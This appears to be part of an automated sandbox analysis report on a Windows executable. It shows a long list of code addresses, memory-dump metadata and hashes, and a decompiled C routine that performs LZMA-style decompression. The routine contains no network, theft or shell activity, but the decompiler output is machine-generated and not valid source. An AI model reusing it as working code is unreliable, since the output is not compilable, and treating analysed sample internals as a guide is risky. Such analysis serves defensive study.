                                                                                                                                                                                                              0x00406af9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406afb
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406afb
                                                                                                                                                                                                              0x00406af9
                                                                                                                                                                                                              0x00406b00
                                                                                                                                                                                                              0x00406b00
                                                                                                                                                                                                              0x00406b00
                                                                                                                                                                                                              0x00406b00
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406b3b
                                                                                                                                                                                                              0x00406b3b
                                                                                                                                                                                                              0x00406b3f
                                                                                                                                                                                                              0x00407147
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407147
                                                                                                                                                                                                              0x00406b45
                                                                                                                                                                                                              0x00406b48
                                                                                                                                                                                                              0x00406b4b
                                                                                                                                                                                                              0x00406b4f
                                                                                                                                                                                                              0x00406b52
                                                                                                                                                                                                              0x00406b58
                                                                                                                                                                                                              0x00406b5a
                                                                                                                                                                                                              0x00406b5a
                                                                                                                                                                                                              0x00406b5a
                                                                                                                                                                                                              0x00406b5d
                                                                                                                                                                                                              0x00406b60
                                                                                                                                                                                                              0x00406b60
                                                                                                                                                                                                              0x00406b66
                                                                                                                                                                                                              0x00406b04
                                                                                                                                                                                                              0x00406b04
                                                                                                                                                                                                              0x00406b07
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406b07
                                                                                                                                                                                                              0x00406b68
                                                                                                                                                                                                              0x00406b68
                                                                                                                                                                                                              0x00406b6b
                                                                                                                                                                                                              0x00406b6e
                                                                                                                                                                                                              0x00406b71
                                                                                                                                                                                                              0x00406b74
                                                                                                                                                                                                              0x00406b77
                                                                                                                                                                                                              0x00406b7a
                                                                                                                                                                                                              0x00406b7d
                                                                                                                                                                                                              0x00406b80
                                                                                                                                                                                                              0x00406b83
                                                                                                                                                                                                              0x00406b86
                                                                                                                                                                                                              0x00406b9e
                                                                                                                                                                                                              0x00406ba1
                                                                                                                                                                                                              0x00406ba4
                                                                                                                                                                                                              0x00406ba7
                                                                                                                                                                                                              0x00406ba7
                                                                                                                                                                                                              0x00406baa
                                                                                                                                                                                                              0x00406bae
                                                                                                                                                                                                              0x00406bb0
                                                                                                                                                                                                              0x00406b88
                                                                                                                                                                                                              0x00406b88
                                                                                                                                                                                                              0x00406b90
                                                                                                                                                                                                              0x00406b95
                                                                                                                                                                                                              0x00406b97
                                                                                                                                                                                                              0x00406b99
                                                                                                                                                                                                              0x00406b99
                                                                                                                                                                                                              0x00406bb3
                                                                                                                                                                                                              0x00406bba
                                                                                                                                                                                                              0x00406bbd
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406bbf
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406bbf
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406e4c
                                                                                                                                                                                                              0x00406e4c
                                                                                                                                                                                                              0x00406e50
                                                                                                                                                                                                              0x00407177
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407177
                                                                                                                                                                                                              0x00406e56
                                                                                                                                                                                                              0x00406e59
                                                                                                                                                                                                              0x00406e5c
                                                                                                                                                                                                              0x00406e60
                                                                                                                                                                                                              0x00406e63
                                                                                                                                                                                                              0x00406e69
                                                                                                                                                                                                              0x00406e6b
                                                                                                                                                                                                              0x00406e6b
                                                                                                                                                                                                              0x00406e6b
                                                                                                                                                                                                              0x00406e6e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f5b
                                                                                                                                                                                                              0x00406f5f
                                                                                                                                                                                                              0x00406f81
                                                                                                                                                                                                              0x00406f84
                                                                                                                                                                                                              0x00406f8e
                                                                                                                                                                                                              0x00406f91
                                                                                                                                                                                                              0x00406f91
                                                                                                                                                                                                              0x00406f91
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f91
                                                                                                                                                                                                              0x00406f91
                                                                                                                                                                                                              0x00406f61
                                                                                                                                                                                                              0x00406f64
                                                                                                                                                                                                              0x00406f68
                                                                                                                                                                                                              0x00406f6b
                                                                                                                                                                                                              0x00406f6b
                                                                                                                                                                                                              0x00406f6e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407018
                                                                                                                                                                                                              0x0040701c
                                                                                                                                                                                                              0x0040703a
                                                                                                                                                                                                              0x0040703a
                                                                                                                                                                                                              0x0040703a
                                                                                                                                                                                                              0x00407041
                                                                                                                                                                                                              0x00407048
                                                                                                                                                                                                              0x0040704f
                                                                                                                                                                                                              0x0040704f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040704f
                                                                                                                                                                                                              0x0040701e
                                                                                                                                                                                                              0x00407021
                                                                                                                                                                                                              0x00407024
                                                                                                                                                                                                              0x00407027
                                                                                                                                                                                                              0x0040702e
                                                                                                                                                                                                              0x00406f72
                                                                                                                                                                                                              0x00406f72
                                                                                                                                                                                                              0x00406f75
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407109
                                                                                                                                                                                                              0x0040710c
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406d43
                                                                                                                                                                                                              0x00406d45
                                                                                                                                                                                                              0x00406d4c
                                                                                                                                                                                                              0x00406d4d
                                                                                                                                                                                                              0x00406d4f
                                                                                                                                                                                                              0x00406d52
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406d5a
                                                                                                                                                                                                              0x00406d5d
                                                                                                                                                                                                              0x00406d60
                                                                                                                                                                                                              0x00406d62
                                                                                                                                                                                                              0x00406d64
                                                                                                                                                                                                              0x00406d64
                                                                                                                                                                                                              0x00406d65
                                                                                                                                                                                                              0x00406d68
                                                                                                                                                                                                              0x00406d6f
                                                                                                                                                                                                              0x00406d72
                                                                                                                                                                                                              0x00406d80
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407056
                                                                                                                                                                                                              0x00407056
                                                                                                                                                                                                              0x00407059
                                                                                                                                                                                                              0x00407060
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407065
                                                                                                                                                                                                              0x00407065
                                                                                                                                                                                                              0x00407069
                                                                                                                                                                                                              0x004071a1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004071a1
                                                                                                                                                                                                              0x0040706f
                                                                                                                                                                                                              0x00407072
                                                                                                                                                                                                              0x00407075
                                                                                                                                                                                                              0x00407079
                                                                                                                                                                                                              0x0040707c
                                                                                                                                                                                                              0x00407082
                                                                                                                                                                                                              0x00407084
                                                                                                                                                                                                              0x00407084
                                                                                                                                                                                                              0x00407084
                                                                                                                                                                                                              0x00407087
                                                                                                                                                                                                              0x0040708a
                                                                                                                                                                                                              0x0040708a
                                                                                                                                                                                                              0x0040708a
                                                                                                                                                                                                              0x0040708a
                                                                                                                                                                                                              0x0040708d
                                                                                                                                                                                                              0x0040708d
                                                                                                                                                                                                              0x00407091
                                                                                                                                                                                                              0x004070f1
                                                                                                                                                                                                              0x004070f4
                                                                                                                                                                                                              0x004070f9
                                                                                                                                                                                                              0x004070fa
                                                                                                                                                                                                              0x004070fc
                                                                                                                                                                                                              0x004070fe
                                                                                                                                                                                                              0x00407101
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407013
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x00407093
                                                                                                                                                                                                              0x00407099
                                                                                                                                                                                                              0x0040709c
                                                                                                                                                                                                              0x0040709f
                                                                                                                                                                                                              0x004070a2
                                                                                                                                                                                                              0x004070a5
                                                                                                                                                                                                              0x004070a8
                                                                                                                                                                                                              0x004070ab
                                                                                                                                                                                                              0x004070ae
                                                                                                                                                                                                              0x004070b1
                                                                                                                                                                                                              0x004070b4
                                                                                                                                                                                                              0x004070cd
                                                                                                                                                                                                              0x004070d0
                                                                                                                                                                                                              0x004070d3
                                                                                                                                                                                                              0x004070d6
                                                                                                                                                                                                              0x004070da
                                                                                                                                                                                                              0x004070dc
                                                                                                                                                                                                              0x004070dc
                                                                                                                                                                                                              0x004070dd
                                                                                                                                                                                                              0x004070e0
                                                                                                                                                                                                              0x004070b6
                                                                                                                                                                                                              0x004070b6
                                                                                                                                                                                                              0x004070be
                                                                                                                                                                                                              0x004070c3
                                                                                                                                                                                                              0x004070c5
                                                                                                                                                                                                              0x004070c8
                                                                                                                                                                                                              0x004070c8
                                                                                                                                                                                                              0x004070e3
                                                                                                                                                                                                              0x004070ea
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004070ec
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004070ec
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406d88
                                                                                                                                                                                                              0x00406d8b
                                                                                                                                                                                                              0x00406dc1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef1
                                                                                                                                                                                                              0x00406ef4
                                                                                                                                                                                                              0x00406ef4
                                                                                                                                                                                                              0x00406ef7
                                                                                                                                                                                                              0x00406ef9
                                                                                                                                                                                                              0x00407183
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407183
                                                                                                                                                                                                              0x00406eff
                                                                                                                                                                                                              0x00406f02
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f08
                                                                                                                                                                                                              0x00406f0c
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f0f
                                                                                                                                                                                                              0x00406d8d
                                                                                                                                                                                                              0x00406d8f
                                                                                                                                                                                                              0x00406d91
                                                                                                                                                                                                              0x00406d93
                                                                                                                                                                                                              0x00406d96
                                                                                                                                                                                                              0x00406d97
                                                                                                                                                                                                              0x00406d99
                                                                                                                                                                                                              0x00406d9b
                                                                                                                                                                                                              0x00406d9e
                                                                                                                                                                                                              0x00406da1
                                                                                                                                                                                                              0x00406db7
                                                                                                                                                                                                              0x00406dbc
                                                                                                                                                                                                              0x00406df4
                                                                                                                                                                                                              0x00406df4
                                                                                                                                                                                                              0x00406df8
                                                                                                                                                                                                              0x00406e24
                                                                                                                                                                                                              0x00406e26
                                                                                                                                                                                                              0x00406e2d
                                                                                                                                                                                                              0x00406e30
                                                                                                                                                                                                              0x00406e33
                                                                                                                                                                                                              0x00406e33
                                                                                                                                                                                                              0x00406e38
                                                                                                                                                                                                              0x00406e38
                                                                                                                                                                                                              0x00406e3a
                                                                                                                                                                                                              0x00406e3d
                                                                                                                                                                                                              0x00406e44
                                                                                                                                                                                                              0x00406e47
                                                                                                                                                                                                              0x00406e74
                                                                                                                                                                                                              0x00406e74
                                                                                                                                                                                                              0x00406e77
                                                                                                                                                                                                              0x00406e7a
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406eee
                                                                                                                                                                                                              0x00406e7c
                                                                                                                                                                                                              0x00406e82
                                                                                                                                                                                                              0x00406e85
                                                                                                                                                                                                              0x00406e88
                                                                                                                                                                                                              0x00406e8b
                                                                                                                                                                                                              0x00406e8e
                                                                                                                                                                                                              0x00406e91
                                                                                                                                                                                                              0x00406e94
                                                                                                                                                                                                              0x00406e97
                                                                                                                                                                                                              0x00406e9a
                                                                                                                                                                                                              0x00406e9d
                                                                                                                                                                                                              0x00406eb6
                                                                                                                                                                                                              0x00406eb8
                                                                                                                                                                                                              0x00406ebb
                                                                                                                                                                                                              0x00406ebc
                                                                                                                                                                                                              0x00406ebf
                                                                                                                                                                                                              0x00406ec1
                                                                                                                                                                                                              0x00406ec4
                                                                                                                                                                                                              0x00406ec6
                                                                                                                                                                                                              0x00406ec8
                                                                                                                                                                                                              0x00406ecb
                                                                                                                                                                                                              0x00406ecd
                                                                                                                                                                                                              0x00406ed0
                                                                                                                                                                                                              0x00406ed4
                                                                                                                                                                                                              0x00406ed6
                                                                                                                                                                                                              0x00406ed6
                                                                                                                                                                                                              0x00406ed7
                                                                                                                                                                                                              0x00406eda
                                                                                                                                                                                                              0x00406edd
                                                                                                                                                                                                              0x00406e9f
                                                                                                                                                                                                              0x00406e9f
                                                                                                                                                                                                              0x00406ea7
                                                                                                                                                                                                              0x00406eac
                                                                                                                                                                                                              0x00406eae
                                                                                                                                                                                                              0x00406eb1
                                                                                                                                                                                                              0x00406eb1
                                                                                                                                                                                                              0x00406ee0
                                                                                                                                                                                                              0x00406ee7
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00406e71
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406ee9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406ee9
                                                                                                                                                                                                              0x00406ee7
                                                                                                                                                                                                              0x00406dfa
                                                                                                                                                                                                              0x00406dfd
                                                                                                                                                                                                              0x00406dff
                                                                                                                                                                                                              0x00406e02
                                                                                                                                                                                                              0x00406e05
                                                                                                                                                                                                              0x00406e08
                                                                                                                                                                                                              0x00406e0a
                                                                                                                                                                                                              0x00406e0d
                                                                                                                                                                                                              0x00406e10
                                                                                                                                                                                                              0x00406e10
                                                                                                                                                                                                              0x00406e13
                                                                                                                                                                                                              0x00406e13
                                                                                                                                                                                                              0x00406e16
                                                                                                                                                                                                              0x00406e1d
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00406df1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406e1f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406e1f
                                                                                                                                                                                                              0x00406e1d
                                                                                                                                                                                                              0x00406da3
                                                                                                                                                                                                              0x00406da6
                                                                                                                                                                                                              0x00406da8
                                                                                                                                                                                                              0x00406dab
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406b0a
                                                                                                                                                                                                              0x00406b0a
                                                                                                                                                                                                              0x00406b0e
                                                                                                                                                                                                              0x00407153
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00407153
                                                                                                                                                                                                              0x00406b14
                                                                                                                                                                                                              0x00406b17
                                                                                                                                                                                                              0x00406b1a
                                                                                                                                                                                                              0x00406b1d
                                                                                                                                                                                                              0x00406b20
                                                                                                                                                                                                              0x00406b23
                                                                                                                                                                                                              0x00406b26
                                                                                                                                                                                                              0x00406b28
                                                                                                                                                                                                              0x00406b2b
                                                                                                                                                                                                              0x00406b2e
                                                                                                                                                                                                              0x00406b31
                                                                                                                                                                                                              0x00406b33
                                                                                                                                                                                                              0x00406b33
                                                                                                                                                                                                              0x00406b33
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406c95
                                                                                                                                                                                                              0x00406c95
                                                                                                                                                                                                              0x00406c99
                                                                                                                                                                                                              0x0040715f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040715f
                                                                                                                                                                                                              0x00406c9f
                                                                                                                                                                                                              0x00406ca2
                                                                                                                                                                                                              0x00406ca5
                                                                                                                                                                                                              0x00406ca8
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406caa
                                                                                                                                                                                                              0x00406cad
                                                                                                                                                                                                              0x00406cb0
                                                                                                                                                                                                              0x00406cb3
                                                                                                                                                                                                              0x00406cb6
                                                                                                                                                                                                              0x00406cb9
                                                                                                                                                                                                              0x00406cbc
                                                                                                                                                                                                              0x00406cbd
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cbf
                                                                                                                                                                                                              0x00406cc2
                                                                                                                                                                                                              0x00406cc5
                                                                                                                                                                                                              0x00406cc8
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406ccb
                                                                                                                                                                                                              0x00406cce
                                                                                                                                                                                                              0x00406cd0
                                                                                                                                                                                                              0x00406cd0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f12
                                                                                                                                                                                                              0x00406f16
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f1c
                                                                                                                                                                                                              0x00406f1f
                                                                                                                                                                                                              0x00406f22
                                                                                                                                                                                                              0x00406f25
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f27
                                                                                                                                                                                                              0x00406f2a
                                                                                                                                                                                                              0x00406f2d
                                                                                                                                                                                                              0x00406f30
                                                                                                                                                                                                              0x00406f33
                                                                                                                                                                                                              0x00406f36
                                                                                                                                                                                                              0x00406f39
                                                                                                                                                                                                              0x00406f3a
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3c
                                                                                                                                                                                                              0x00406f3f
                                                                                                                                                                                                              0x00406f42
                                                                                                                                                                                                              0x00406f45
                                                                                                                                                                                                              0x00406f48
                                                                                                                                                                                                              0x00406f4b
                                                                                                                                                                                                              0x00406f4f
                                                                                                                                                                                                              0x00406f51
                                                                                                                                                                                                              0x00406f54
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406f56
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406cd3
                                                                                                                                                                                                              0x00406f54
                                                                                                                                                                                                              0x00407189
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004067b8
                                                                                                                                                                                                              0x004071c0
                                                                                                                                                                                                              0x004071c0
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004071c0
                                                                                                                                                                                                              0x0040700d
                                                                                                                                                                                                              0x00406f94
                                                                                                                                                                                                              0x00406f91
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00406ce6

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
                                                                                                                                                                                                              • Instruction ID: a9aff89c954bf491ffe4c30e494efe667c8bfb024e4a61e14b5544386b4e6ab4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e7a7db026ec9aad88acaa11386c02789d7bc6b83e00ba9479abd6ecc9ecffba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47713471D04229CBDF28CF98C844BADBBB1FF48305F15806AD856BB281C7786996DF45
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                                                                              			E00406C2E() {
                                                                                                                                                                                                              				unsigned short _t531;
                                                                                                                                                                                                              				signed int _t532;
                                                                                                                                                                                                              				void _t533;
                                                                                                                                                                                                              				signed int _t534;
                                                                                                                                                                                                              				signed int _t535;
                                                                                                                                                                                                              				signed int _t565;
                                                                                                                                                                                                              				signed int _t568;
                                                                                                                                                                                                              				signed int _t589;
                                                                                                                                                                                                              				signed int* _t606;
                                                                                                                                                                                                              				void* _t613;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				L0:
                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                              					L0:
                                                                                                                                                                                                              					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                                                                              						 *(_t613 - 0x84) = 0xa;
                                                                                                                                                                                                              						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						 *(__ebp - 0x84) = 9;
                                                                                                                                                                                                              						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                              						 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                              							L133:
                                                                                                                                                                                                              							_t531 =  *_t606;
                                                                                                                                                                                                              							_t589 = _t531 & 0x0000ffff;
                                                                                                                                                                                                              							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                                              							if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                                              								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                                              								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                                              								 *(_t613 - 0x40) = 1;
                                                                                                                                                                                                              								_t532 = _t531 - (_t531 >> 5);
                                                                                                                                                                                                              								 *_t606 = _t532;
                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                              								 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                                              								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                              								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                              								goto L139;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							L137:
                                                                                                                                                                                                              							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                              								 *(_t613 - 0x88) = 5;
                                                                                                                                                                                                              								L170:
                                                                                                                                                                                                              								_t568 = 0x22;
                                                                                                                                                                                                              								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                                                                              								_t535 = 0;
                                                                                                                                                                                                              								L172:
                                                                                                                                                                                                              								return _t535;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                                                                              							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                              							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                              							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                              							L139:
                                                                                                                                                                                                              							_t533 =  *(_t613 - 0x84);
                                                                                                                                                                                                              							while(1) {
                                                                                                                                                                                                              								 *(_t613 - 0x88) = _t533;
                                                                                                                                                                                                              								while(1) {
                                                                                                                                                                                                              									L1:
                                                                                                                                                                                                              									_t534 =  *(_t613 - 0x88);
                                                                                                                                                                                                              									if(_t534 > 0x1c) {
                                                                                                                                                                                                              										break;
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              									switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
                                                                                                                                                                                                              										case 0:
                                                                                                                                                                                                              											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                              											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                              											_t534 =  *( *(_t613 - 0x70));
                                                                                                                                                                                                              											if(_t534 > 0xe1) {
                                                                                                                                                                                                              												goto L171;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t538 = _t534 & 0x000000ff;
                                                                                                                                                                                                              											_push(0x2d);
                                                                                                                                                                                                              											asm("cdq");
                                                                                                                                                                                                              											_pop(_t570);
                                                                                                                                                                                                              											_push(9);
                                                                                                                                                                                                              											_pop(_t571);
                                                                                                                                                                                                              											_t609 = _t538 / _t570;
                                                                                                                                                                                                              											_t540 = _t538 % _t570 & 0x000000ff;
                                                                                                                                                                                                              											asm("cdq");
                                                                                                                                                                                                              											_t604 = _t540 % _t571 & 0x000000ff;
                                                                                                                                                                                                              											 *(_t613 - 0x3c) = _t604;
                                                                                                                                                                                                              											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                                                                              											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                                                                                                                                                              											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                                                                              											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                                                                              												L10:
                                                                                                                                                                                                              												if(_t612 == 0) {
                                                                                                                                                                                                              													L12:
                                                                                                                                                                                                              													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                                                                              													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                              													goto L15;
                                                                                                                                                                                                              												} else {
                                                                                                                                                                                                              													goto L11;
                                                                                                                                                                                                              												}
                                                                                                                                                                                                              												do {
                                                                                                                                                                                                              													L11:
                                                                                                                                                                                                              													_t612 = _t612 - 1;
                                                                                                                                                                                                              													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                                                                              												} while (_t612 != 0);
                                                                                                                                                                                                              												goto L12;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											if( *(_t613 - 4) != 0) {
                                                                                                                                                                                                              												GlobalFree( *(_t613 - 4));
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                                              											 *(_t613 - 4) = _t534;
                                                                                                                                                                                                              											if(_t534 == 0) {
                                                                                                                                                                                                              												goto L171;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                                                                              												goto L10;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              										case 1:
                                                                                                                                                                                                              											L13:
                                                                                                                                                                                                              											__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                                              											if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                              												 *(_t613 - 0x88) = 1;
                                                                                                                                                                                                              												goto L170;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                              											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                                                                              											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                              											_t45 = _t613 - 0x48;
                                                                                                                                                                                                              											 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                                                                              											__eflags =  *_t45;
                                                                                                                                                                                                              											L15:
                                                                                                                                                                                                              											if( *(_t613 - 0x48) < 4) {
                                                                                                                                                                                                              												goto L13;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t546 =  *(_t613 - 0x40);
                                                                                                                                                                                                              											if(_t546 ==  *(_t613 - 0x74)) {
                                                                                                                                                                                                              												L20:
                                                                                                                                                                                                              												 *(_t613 - 0x48) = 5;
                                                                                                                                                                                                              												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                                              												goto L23;
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											 *(_t613 - 0x74) = _t546;
                                                                                                                                                                                                              											if( *(_t613 - 8) != 0) {
                                                                                                                                                                                                              												GlobalFree( *(_t613 - 8));
                                                                                                                                                                                                              											}
                                                                                                                                                                                                              											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                                                                                                                                                              											 *(_t613 - 8) = _t534;
                                                                                                                                                                                                              											if(_t534 == 0) {
                                                                                                                                                                                                              												goto L171;
                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                              												goto L20;
                                                                                                                                                                                                              											}
